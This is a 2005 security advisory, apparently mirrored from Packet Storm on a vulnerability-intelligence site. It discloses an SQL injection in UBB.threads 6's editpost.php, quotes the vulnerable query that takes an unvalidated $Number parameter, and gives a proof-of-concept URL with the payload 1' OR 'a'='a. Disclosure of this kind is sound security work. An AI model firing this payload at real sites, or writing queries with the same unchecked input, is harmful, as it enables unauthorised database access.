Lucene search

K

ubbSQL.txt

🗓️ 15 Mar 2005 00:00:00Reported by kreonType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

SQL Injection vulnerability found in UBB.threads editpost.php due to unvalidated input handling.

Show more
Code
`  
  
  
ADZ Security Team  
===================  
Info  
  
Program: UBB.threads  
Version: 6  
Module: editpost.php  
Bug type: SQL Injection  
Vendor site: http://www.ubbcentral.com/ubbthreads/  
===================  
Bug discription  
  
at editpost.php we can see this code:  
// START  
$Cat = get_input("Cat","get");  
$Board = get_input("Board","get");  
$Number = get_input("Number","get");  
$page = get_input("page","get");  
$what = get_input("what","get");  
$vc = get_input("vc","get");  
// ...........  
$query = "  
SELECT  
B_Posterid,B_Subject,B_Body,B_Approved,B_Kept,B_Status,B_Main,B_Sticky,  
B_Posted,B_Icon,B_Poll,B_Convert,B_Topic,B_CalDay,B_CalMonth,B_CalYear,  
B_AddSig,B_Board FROM {$config['tbprefix']}Posts  
WHERE B_Number = '$Number'  
";  
//..........  
// END  
As we see, $Number not checked as int value, so... :)  
===================  
Example/PoC:  
  
http://[host]/[path]/editpost.php?Cat=X&Board=X&Number=1'%20OR%20'a'='a  
===================  
Contact  
  
ADZ Security Team // http://adz.void.ru/  
kreon // [email protected], [email protected]  
===================  
  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
15 Mar 2005 00:00Current
7.4High risk
Vulners AI Score7.4
22
.json
Report